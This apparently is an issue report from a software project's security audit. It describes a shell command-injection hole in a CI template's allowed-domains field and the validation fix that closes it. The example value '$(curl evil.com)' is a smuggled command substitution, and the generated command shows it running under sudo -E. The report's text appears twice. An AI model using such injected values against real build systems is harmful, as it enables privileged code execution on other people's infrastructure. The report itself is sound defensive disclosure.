Problem
The template fix for Finding 4 (#171) wraps {{ allowed_domains }} in double quotes in base.yml, but bash double-quoted strings still expand $(...) and ${...}. A user who adds $(curl evil.com) to network.allow will pass compilation and generate:
sudo -E ".../awf" \
--allow-domains "github.com,$(curl evil.com),other.com"
That command substitution executes on the runner with sudo -E.
Fix Applied
generate_allowed_domains now validates domains against strict DNS characters ([A-Za-z0-9.*-]) and returns a hard error for invalid characters. Changed from warn-and-skip to bail!.
Fixed in #175.
Related
Problem
The template fix for Finding 4 (#171) wraps
{{ allowed_domains }}in double quotes inbase.yml, but bash double-quoted strings still expand$(...)and${...}. A user who adds$(curl evil.com)tonetwork.allowwill pass compilation and generate:That command substitution executes on the runner with
sudo -E.Fix Applied
generate_allowed_domainsnow validates domains against strict DNS characters ([A-Za-z0-9.*-]) and returns a hard error for invalid characters. Changed from warn-and-skip tobail!.Fixed in #175.
Related